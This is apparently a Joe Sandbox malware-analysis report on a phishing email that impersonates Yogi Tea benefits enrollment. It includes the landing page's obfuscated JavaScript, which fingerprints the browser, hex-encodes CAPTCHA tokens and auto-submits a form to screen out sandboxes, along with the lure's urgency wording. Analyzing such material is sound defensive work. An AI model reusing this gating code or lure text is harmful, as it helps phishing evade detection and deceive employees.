URL: email Model: Joe Sandbox AI | {
"explanation": [
"Multiple suspicious HTML attachments related to sensitive financial/benefits information",
"Generic subject line and minimal email body content are suspicious",
"Benefits enrollment emails typically come from HR or benefits providers, not generic company email"
],
"phishing": true,
"confidence": 9,
"generated_by_ai": false
} |
{
"date": "Saturday-December-2024 15:20 PM",
"subject": "Yogi Tea Open Benefit eligible for lindsey.johnson",
"communications": [
"\n[cid:image001.png@01D9AD87.FE3310D0]\nIT Operations Manager\n\n\n\n\n\n"
],
"from": "Yogi Tea <Yogiproducts@yogiproducts.com>",
"to": "lindsey.johnson@yogiproducts.com",
"attachements": [
"Eligible Finance Insurance Benefits Open Enrollment Plan.html",
"Health Insurance Benefits Open Enrollment Plan.html",
"Yogi Tea Life Insurance Benefits Open Enrollment Plan.html",
"Yogi Tea FSA Benefits Enrollment Plan.html",
"Yogi Tea 401k Enrollment Plan.html"
]
} |
URL: Email Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "If you fail to enroll this November, your current benefits will not roll over and you will have to wait until the next open enrollment period (November 2025).",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: Email Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
URL: Email Model: Joe Sandbox AI | {"classification":"Payroll Fraud"} |
Email:
Detected potential phishing email: Multiple suspicious HTML attachments related to sensitive financial/benefits information. Generic subject line and minimal email body content are suspicious. Benefits enrollment emails typically come from HR or benefits providers, not generic company email. |
URL: https://login.itpishro.com/vmiddle9999... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code. While some of the behaviors may be related to legitimate functionality, such as browser detection and CAPTCHA handling, the overall complexity and lack of transparency raise significant security concerns."
} |
// Replaces the current history entry's URL with "/" without reloading the page,
// so the path the visitor arrived on (shown truncated in this report as
// /vmiddle9999...) is no longer what the address bar displays after this runs.
// NOTE(review): network/proxy logs are the more reliable place to recover the
// original lure path; what the browser's own history retains is not shown here.
history.replaceState({},"","/");
// String-table rotation stub. It is called with the table accessor (_0x83b1)
// and a target checksum (0x37b68 = 228200).
// Each pass evaluates an arithmetic expression over parseInt() of nine table
// entries looked up through _0x10f1. While the result differs from the target,
// the table is rotated left by one element (push(shift())) and the check repeats.
// Because _0x83b1 always hands back the same array instance, the rotation is
// visible to every later _0x10f1 lookup.
// Analyst note (worked by hand from the table in _0x83b1): the checksum matches
// after 10 rotations, at which point index 0x1d3 resolves to 'length' and
// 0x1d6 to 'toString'. Those are the only two lookups used outside this stub.
(function (_0x2b8318, _0x263e16) {
var _0x41b7ab = _0x10f1, _0x1397c9 = _0x2b8318();
while (!![]) {
try {
// parseInt() reads only the leading digits of entries such as '360792nEGbWg';
// the trailing letters are filler.
var _0x56aa45 = parseInt(_0x41b7ab(0x1d8)) / 0x1 + -parseInt(_0x41b7ab(0x1d1)) / 0x2 * (-parseInt(_0x41b7ab(0x1d4)) / 0x3) + parseInt(_0x41b7ab(0x1ce)) / 0x4 + -parseInt(_0x41b7ab(0x1d0)) / 0x5 + -parseInt(_0x41b7ab(0x1d2)) / 0x6 + parseInt(_0x41b7ab(0x1d5)) / 0x7 * (parseInt(_0x41b7ab(0x1cf)) / 0x8) + -parseInt(_0x41b7ab(0x1d7)) / 0x9;
if (_0x56aa45 === _0x263e16)
break;
else
_0x1397c9['push'](_0x1397c9['shift']());
} catch (_0x4bf6eb) {
// Any exception during the check is treated like a mismatch: rotate and retry.
_0x1397c9['push'](_0x1397c9['shift']());
}
}
}(_0x83b1, 0x37b68));
// Hex-encodes a string: for each UTF-16 code unit of the argument, appends
// charCodeAt(i).toString(16) to the result, with no delimiter and no zero
// padding. The property names are fetched through the string table
// (0x1d3 -> 'length', 0x1d6 -> 'toString' once the table has been rotated).
// This is an encoding, not encryption: for printable ASCII every character
// becomes exactly two hex digits, so the output can be read back directly.
// The page-level code in this script applies it to the browser name, the
// platform type and both CAPTCHA tokens before writing them to form fields.
// NOTE(review): the long hex hostname labels in the $Config captured later in
// this report decode the same way (61616463646e2e6d736674617574682e6e6574 ->
// "aadcdn.msftauth.net"), so the convention looks shared across the kit. That
// makes it a candidate pattern for URL/DNS detection; confirm on further samples.
function _0x74739(_0x1c737b) {
var _0xe2ac07 = _0x10f1, _0x41fa4e = '';
for (var _0x859b98 = 0x0; _0x859b98 < _0x1c737b[_0xe2ac07(0x1d3)]; _0x859b98++) {
_0x41fa4e += '' + _0x1c737b['charCodeAt'](_0x859b98)[_0xe2ac07(0x1d6)](0x10);
}
return _0x41fa4e;
}
// String-table lookup. On the first call it fetches the table from _0x83b1,
// replaces itself with a closure over that array, and then serves the request.
// The closure subtracts the base offset 0x1ce from the requested index and
// returns the table entry at that position. The second parameter is accepted
// but never read.
function _0x10f1(_0x1774c9, _0x33db3a) {
var _0x83b16f = _0x83b1();
return _0x10f1 = function (_0x10f12d, _0x1f2413) {
_0x10f12d = _0x10f12d - 0x1ce;
var _0x2cd561 = _0x83b16f[_0x10f12d];
return _0x2cd561;
}, _0x10f1(_0x1774c9, _0x33db3a);
}
// String-table accessor. The first call builds the 11-entry array and replaces
// this function with one that returns that same array instance, so callers
// share (and can rotate) a single table.
// Only 'length' and 'toString' are used as property names elsewhere in this
// script. The digit-prefixed entries are read only by the rotation stub, which
// feeds them to parseInt() as checksum operands.
function _0x83b1() {
var _0x868a6c = [
'10344HVpkDN',
'1802055NkIvet',
'107612iBMkFH',
'1466220eCvEHF',
'length',
'18umtuTH',
'987DihKGv',
'toString',
'4036734cyjByR',
'360792nEGbWg',
'1662264AFuwvD'
];
_0x83b1 = function () {
return _0x868a6c;
};
return _0x83b1();
}
// Landing-page gate: fingerprint the browser, collect two CAPTCHA tokens, then
// submit the form with id "subAct" on a timer. Every value is passed through
// _0x74739 (hex encoding) before it is written into a form field.
// NOTE(review): presumably the server uses these fields to decide whether the
// visitor is served the next stage (filtering out crawlers and sandboxes);
// the server side is not visible in this capture.

// `bowser` is a global provided by the page; only the parsed browser name and
// platform type are read from its result.
var result = bowser.getParser(window.navigator.userAgent);
document.getElementById("bValue").value = _0x74739(result.parsedResult.browser.name)
document.getElementById("pValue").value = _0x74739(result.parsedResult.platform.type)
// reCAPTCHA token request, made via grecaptcha.execute() with action
// 'validate_captcha'. The hard-coded site key is a stable string an analyst
// can pivot on. The token is written asynchronously and the submit path below
// does not wait for it, so whether it is present at submit time depends on timing.
grecaptcha.ready(function() {
// do request for recaptcha token
// response is promise with passed token
grecaptcha.execute('6LfRF5kqAAAAAAuW2dANii_JwRF95-vsYuOAqHr0', {action:'validate_captcha'})
.then(function(token) {
// add token value to form
document.getElementById('g-recaptcha-response').value = _0x74739(token);
});
});
// Cloudflare Turnstile widget rendered into the element matching '#igp'. The
// same sitekey appears as chlApiSitekey in the challenges.cloudflare.com
// iframe config captured later in this report, which ties that iframe to this page.
window.onloadTurnstileCallback = function () {
turnstile.render('#igp', {
sitekey: '0x4AAAAAAA1_-36g8D2Tj7IT',
callback: function(token) {
document.getElementById('cCapt').value = _0x74739(token);
// Submission is timer-driven: 5000 ms after Turnstile calls back, the form is
// posted without any click on the page's own controls.
setTimeout(() => {
document.getElementById("subAct").submit();
},5000);
},
});
};
//document.getElementById("subAct").submit();
|
URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/R7JXURLP/Eligible%20Finance%20Insurance%20Benefits%20Open%20Enrollment%20Plan.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Click the link below to access your personalized open enrollment information for your completion.",
"prominent_button_name": "Complete your Open Enrollment Form",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/R7JXURLP/Eligible%20Finance%20Insurance%20Benefits%20Open%20Enrollment%20Plan.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Click the link below to access your personalized open enrollment information for your completion.",
"prominent_button_name": "Complete your Open Enrollment Form",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_security_alerts": false
} |
|
URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/R7JXURLP/Eligible%20Finance%20Insurance%20Benefits%20Open%20Enrollment%20Plan.html Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/R7JXURLP/Eligible%20Finance%20Insurance%20Benefits%20Open%20Enrollment%20Plan.html Model: Joe Sandbox AI | {
"brands": [
"Yogi Tea"
]
} |
|
URL: https://www.google.com/recaptcha/api2/anchor?ar=1&... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the script may have a legitimate purpose, such as reCAPTCHA integration, the use of techniques like the `Function` constructor and encoded strings raises significant security concerns. Further investigation is warranted to determine the true nature and intent of this script."
} |
recaptcha.anchor.Main.init("[\x22ainput\x22,[\x22bgdata\x22,\x22Ly93d3cuZ29vZ2xlLmNvbS9qcy9iZy9Gc2FOSVl5UE43Nmkwc0w3ZDNteUlvRmZqTURBdzhlSGM5QUp1TFVybTdBLmpz\x22,\x22\x22,\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 |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate behavior for websites that use Cloudflare's security services. The script sets up various configuration options for the Cloudflare challenge and includes some communication with the parent window, which is a common pattern for these types of challenges. While the script uses some techniques like message passing and dynamic configuration, these are typical for Cloudflare's managed challenge system and do not indicate any malicious intent. Overall, the script seems to be a benign implementation of Cloudflare's challenge functionality."
} |
// Bootstrap for a Cloudflare Turnstile widget iframe (cZone is
// challenges.cloudflare.com). This is vendor code served by Cloudflare, not
// code written by the operator of the embedding page. On its own it shows only
// that the parent page embedded Turnstile.
// What links it to this case is chlApiSitekey, which equals the sitekey passed
// to turnstile.render() on the login.itpishro.com page captured in this report.
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '6oyz2',
chlApiSitekey: '0x4AAAAAAA1_-36g8D2Tj7IT',
chlApiMode: 'managed',
chlApiSize: 'normal',
// chlApiRcV, cH and md below are opaque tokens; each embeds the same number as
// cITimeS (1734376424), so they are presumably per-session challenge state
// rather than durable indicators.
chlApiRcV: 'JZVX9MRjvpVAa1PPqdgCWcB4bDOQVxsash.HSVKAnCc-1734376424-1.3.1.1-AeWOefW83fjeIutWNOgkSSbR9dCBtdf8vf_BtY1lzuE',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f30fe0c18624249',
cH: 'JzTx41TNy8THgG9aQzBr6QRUMpU0y00S9MJ_h2PRdwE-1734376424-1.1.1.1-s7MbRb_Q9mUnG7DTJynMLr3Fl5p.Gj2cblTHIYRqmCa7rEIRSH8PH4hupHI7ZeHJ',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: '4fWI.nasxo6LLlux73.p9g75deeYd2S0l.xayfA2KGQ-1734376424-1.1.1.1-2_d8DLYq1m7r6PPeVIl6AmpWtk0wapjYmo6tmYYj4qVmKYDctsnJTF7zHZJ_YVJe42VALqyBAQNICbaPkAlAMfoay3je5yKALYWbK5SPY0ESkc8ZWbfhbebOqd1L09NUfVc94PxtrXE9U18PQeCaatKaJWtQNGfhOkZ4t5Pym_w.BLePHLa4tm1RsZVuoLlR4KDAy5QvlUt5HsTcrPIlVnejsCIjC4EtLb0YVO7yFgASLzhASDYLsBr7wgThq.5l9Ti38rW0u_qZ7Einm5DKjqcVtWn.BB0g4r_N1_6DhtGXhJzJGBItQQ4MDjfHq8Dkk4fboftINiT2PRvsFG_RK.G_HH2SWQPB1cFYrrVBRlXuMLc_ZH9PY_IiKu4BjkWOWaQxwYXkLTIz0jyptdpy_mGw263RTIJg8kRXen.PjeYsKTMpRx_idt3aJNMSoiKwaa4ZcW2kzDpKm0GuulKXDO_0zB2U7sHSyTLiwxcQt4PuT20DNs.k2.WDkBeoeertpZFSMub0AJpsDwVg6JbBAGt9B1TSs_dB_ZEhVRyzzwPjAfnepNF5gJucpP2LQJWITt0T_O0KCVrj49mXv.i9t8YZjyYYhfXBDAd4H3RWnI1xqqJcBvqDPjAjG0xcg6i24F58R4cs8fcVlUdUY_mafjCv5CrL27zaVVuE.OxNlEiMiwPqETvXYmZKJl4.8bsedTmIh.406WWaVCdOipJyngD8Vb4yAMcMkbGAiw5omkp0XSg3MZkzDTmgMorl6X2_UAzK9afv9vinomPxwlduvY1025nwPb5tGefBVNkl1nJBgM9t5CL1htJcr6HyhGMxStweieSTbMn5_EYC7KR4jzFy50s.pcw8bzZnURnfiCMG4LkZUA_mCr1JINcHy83F7DvDZ_RmVLWgZiM_jWxMzd_XXGpg6GHZnSrX16QKoXJAkQEWpspm1vS4H7_6Dg.8wTx4Rs7rrco4WYZJxD1cJvvLBykAdVorT4hPslJbBkSy5joqW9mKCceomZMpCs209OQ_lTrPk1sEdvQ5.UMVzaGy6Xy7w28zMsE97lpEzo_w8fwdL.U_W5z52hSAjf7QjjBi9fOD.SbOqEb5hUGfyWv.G5O.BIsLO9AUscrqLDPqhJS61lPRfN_8UsbILtf8v_1lZJxLlgXYxBsLIUacjYlfEBdYcSAUD8LO1GKzKELK42Wl5bUlPnKWR60DCEVXbroZT273IfKupNaOXxiP5ex3JvhPMSsODkR1mVPcTY24uVLqFYpfAK8DQCZ1s61AVGBzoY7FyEjtGFHuTwO0Aeb1EeSebx0U0gglTmKaJ1etQgi96BSzKrm__MCscrL_sOrHw9Q.8ut6stDu.z8jrt1XFDZ_xNnXI_y6_Efxa2ym8hrezTeRIawhfws.RivDhowbQ6MYgcxG9owX.KKWKw',
// NOTE(review): read as Unix time, 1734376424 is 2024-12-16 19:13:44 UTC,
// which is useful for placing this capture on the incident timeline.
cITimeS: '1734376424',
// Asks the embedding page to reload the widget: posts a 'reloadRequest'
// message to window.parent with target origin "*".
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: '6oyz2',
nextRcV: 'JZVX9MRjvpVAa1PPqdgCWcB4bDOQVxsash.HSVKAnCc-1734376424-1.3.1.1-AeWOefW83fjeIutWNOgkSSbR9dCBtdf8vf_BtY1lzuE',
event: 'reloadRequest',
}, "*");
}
}
};
// Message handler: when a message carries source 'cloudflare-challenge', event
// 'meow' and this widget's id, it answers the parent with event 'food' and
// echoes the received seq. This looks like a liveness ping between the
// embedding page and the iframe.
// The handler filters on message fields only and does not inspect
// event.origin; the reply contains just the widget id and the echoed seq.
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://www.google.com/js/bg/FsaNIYyPN76i0sL7d3myI... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a minified and obfuscated code, which makes it difficult to analyze. However, based on the observed behaviors, it does not seem to contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code appears to be related to some form of analytics or telemetry functionality, which is a relatively low-risk activity. While the use of legacy APIs like `XDomainRequest` and aggressive DOM manipulation are present, these are considered low-risk indicators. Overall, the risk score is assessed as 3, indicating a low-risk script that may require further review but does not demonstrate clear malicious intent."
} |
/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var E=this||self,e=function(q,b){if(b=(q=null,E).trustedTypes,!b||!b.createPolicy)return q;try{q=b.createPolicy("bg",{createHTML:T,createScript:T,createScriptURL:T})}catch(v){E.console&&E.console.error(v.message)}return q},T=function(q){return q};(0,eval)(function(q,b){return(b=e())&&q.eval(b.createScript("1"))===1?function(v){return b.createScript(v)}:function(v){return""+v}}(E)(Array(Math.random()*7824|0).join("\n")+['(function(){/*',
'',
' Copyright Google LLC',
' SPDX-License-Identifier: Apache-2.0',
'*/',
'var S=function(b,q,v,T,e,G,d,c){if(!q.uF&&(d=void 0,v&&v[0]===O&&(b=v[1],d=v[2],v=void 0),G=l(q,354),G.length==0&&(e=l(q,416)>>3,G.push(b,e>>8&255,e&255),d!=void 0&&G.push(d&255)),b="",v&&(v.message&&(b+=v.message),v.stack&&(b+=":"+v.stack)),v=l(q,28),v[0]>3)){q.C=(v=(v[0]-=(b=b.slice(0,(v[0]|0)-3),(b.length|0)+3),b=qE(b),q.C),q);try{q.H8?(T=(T=l(q,462))&&T[T.length-1]||95,(c=l(q,33))&&c[c.length-1]==T||H([T&255],q,33)):H([95],q,462),H(g(2,b.length).concat(b),q,258,9)}finally{q.C=v}}},Ep=function(b,q,v,T,e){function G(){}return{invoke:function(d,c,P,E){function Y(){v(function(f){v9(function(){d(f)})},P)}if(!c)return c=e(P),d&&d(c),c;v?Y():(E=G,G=function(){v9((E(),Y))})},pe:(T=(e=(b=b9(b,function(d){G&&(q&&v9(q),v=d,G(),G=void 0)},(v=void 0,!!q)),b[0]),b[1]),function(d){T&&T(d)})}},TC=function(b,q){function v(){this.S=(this.n=0,[])}return[function(T){b.G6(T),q.G6(T)},(q=new (v.prototype.E_=(v.prototype.G6=function(T,e){this.S.length<(this.n++,50)?this.S.push(T):(e=Math.floor(Math.random()*this.n),e<50&&(this.S[e]=T))},function(){if(this.n===0)return[0,0];return[(this.S.sort(function(T,e){return T-e}),this.n),this.S[this.S.length>>1]]}),b=new v,v),function(T){return q=(T=b.E_().concat(q.E_()),new v),T})]},Z,YY=function(b){return b},f4=function(b,q){return b[q]<<24|b[(q|0)+1]<<16|b[(q|0)+2]<<8|b[(q|0)+3]},W=function(b,q,v,T,e,G){if(b.Z.length){b.mR=(b.g=!(b.g&&":TQR:TQR:"(),0),v);try{e=b.X(),b.U=e,b.A=0,b.O=0,b.v=e,T=GC(v,b),q=q?0:10,G=b.X()-b.v,b.e6+=G,b.Z2&&b.Z2(G-b.u,b.N,b.L,b.O),b.u=0,b.L=false,b.N=false,G<q||b.W8--<=0||(G=Math.floor(G),b.CU.push(G<=254?G:254))}finally{b.g=false}return T}},NE=function(b,q){return 
X[q](X.prototype,{floor:b,propertyIsEnumerable:b,parent:b,replace:b,pop:b,console:b,splice:b,call:b,stack:b,document:b,prototype:b,length:b})},a=this||self,J=function(b,q,v){if(b==246||b==416)q.I[b]?q.I[b].concat(v):q.I[b]=Op(v,q);else{if(q.uF&&b!=278)return;b==214||b==258||b==454||b==290||b==354||b==462||b==33||b==172||b==221||b==28?q.I[b]||(q.I[b]=QP(v,86,b,q)):q.I[b]=QP(v,105,b,q)}b==278&&(q.Y=w(false,q,32),q.J=void 0)},z=function(b,q,v,T,e,G,d){d=this;try{l9(G,this,e,v,q,T,b)}catch(c){t(c,this),T(function(P){P(d.H)})}},l=function(b,q){if(b=b.I[q],b===void 0)throw[O,30,q];if(b.value)return b.create();return b.create(q*5*q+-18*q+86),b.prototype},Sk=function(b,q,v,T,e){if(e=b[0],e==c9)q.L=true,q.W8=25,q.i(b);else if(e==D){T=b[1];try{v=q.H||q.i(b)}catch(G){t(G,q),v=q.H}b=q.X(),T(v),q.u+=q.X()-b}else if(e==Ay)b[3]&&(q.N=true),b[4]&&(q.L=true),q.i(b);else if(e==H9)q.N=true,q.i(b);else if(e==P9){try{for(v=0;v<q.s.length;v++)try{T=q.s[v],T[0][T[1]](T[2])}catch(G){}}catch(G){}((0,b[1])(function(G,d){q.IF(G,true,d)},(q.s=[],v=q.X(),function(G){n([go],(G=!q.Z.length,q)),G&&W(q,false,true)}),function(G){return q.Xh(G)},function(G,d){return q.t9(G,d)}),q).u+=q.X()-v}else{if(e==hy)return v=b[2],J(461,q,b[6]),J(6,q,v),q.i(b);e==go?(q.I=null,q.T=[],q.CU=[]):e==yP&&a.document.readyState==="loading"&&(q.K=function(G,d){function c(){d||(d=true,G())}(a.document.addEventListener("DOMContentLoaded",c,(d=false,F)),a).addEventListener("load",c,F)})}},w=function(b,q,v,T,e,G,d,c,P,E,Y,f,N,Q){if((c=l(q,246),c)>=q.D)throw[O,31];for(f=(Q=v,(T=0,q.c8).length),E=c;Q>0;)Y=E>>3,e=E%8,d=q.T[Y],N=8-(e|0),N=N<Q?N:Q,b&&(G=q,G.J!=E>>6&&(G.J=E>>6,P=l(G,278),G.P8=Zs(G.J,G.Y,[0,0,P[1],P[2]])),d^=q.P8[Y&f]),T|=(d>>8-(e|0)-(N|0)&(1<<N)-1)<<(Q|0)-(N|0) |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles the Cloudflare challenge UI and translations, which is a legitimate use case. While the script uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a standard Cloudflare challenge implementation and does not raise significant security concerns."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_overrun_description":"Stuck%20here%3F","turnstile_timeout":"Timed%20out","turnstile_expired":"Expired","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","testing_only":"Testing%20only.","turnstile_failure":"Error","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_privacy":"Privacy","turnstile_feedback_description":"Send%20Feedback","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%2
0if%20the%20issue%20persists.","turnstile_success":"Success%21","turnstile_refresh":"Refresh","human_button_text":"Verify%20you%20are%20human","turnstile_feedback_report":"Having%20trouble%3F","turnstile_footer_terms":"Terms","turnstile_verifying":"Verifying..."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eR,fj,fm,fo,fp,fq,fC,fO,fU,fV,fW,g6,gh,gl,gv,gz,gA,gB,gC,gG,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1600))/1+-parseInt(gI(438))/2*(-parseInt(gI(1132))/3)+parseInt(gI(872))/4*(-parseInt(gI(642))/5)+parseInt(gI(1416))/6*(parseInt(gI(1310))/7)+parseInt(gI(1673))/8*(parseInt(gI(1335))/9)+parseInt(gI(1835))/10*(-parseInt(gI(925))/11)+parseInt(gI(1628))/12*(-parseInt(gI(1309))/13),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,402277),eM=this||self,eN=eM[gJ(756)],eO=[],eP=0;256>eP;eO[eP]=String[gJ(1085)](eP),eP++);eQ=(0,eval)(gJ(688)),eR=atob(gJ(656)),eM[gJ(626)]=function(hk,d,e,f,g){hk=gJ,d={},d[hk(1274)]=hk(525),d[hk(549)]=hk(1476),d[hk(796)]=hk(919),d[hk(1746)]=function(h,i){return h<<i},e=d,f=1,g=1e3*eM[hk(1695)][hk(904)](e[hk(1746)](2,f),32),eM[hk(1738)](function(hl){hl=hk,eM[hl(525)]&&(eM[hl(1809)][hl(1626)](),eM[hl(1809)][hl(1839)](),eM[hl(637)]=!![],eM[e[hl(1274)]][hl(542)]({'source':e[hl(549)],'widgetId':eM[hl(1187)][hl(510)],'event':e[hl(796)],'cfChlOut':eM[hl(1187)][hl(1442)],'cfChlOutS':eM[hl(1187)][hl(1496)],'code':hl(1183),'rcV':eM[hl(1187)][hl(1332)]},'*'))},g)},eM[gJ(558)]=function(g,h,i,hm,j,k,l,m,n,o,s,x,B,C,D,E,F){k=(hm=gJ,j={},j[hm(1168)]=function(G,H){return G+H},j[hm(1740)]=hm(1039),j[hm(1739)]=hm(921),j[hm(1424)]=function(G,H){return G instanceof H},j[hm(1690)]=hm(1002),j[hm(1669)]=function(G,H){return G||H},j[hm(965)]=hm(1052),j[hm(724)]=function(G,H){return G+H},j[hm(1328)]=function(G,H){return G+H},j[hm(653)]=function(G,H){return 
G+H},j[hm(1053)]=hm(1460),j[hm(1381)]=hm(1417),j[hm(1671)]=hm(629),j);try{if(l=fh(g[hm(1755)],g[hm(18 |
URL: https://challenges.cloudflare.com/turnstile/v0/g/f... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
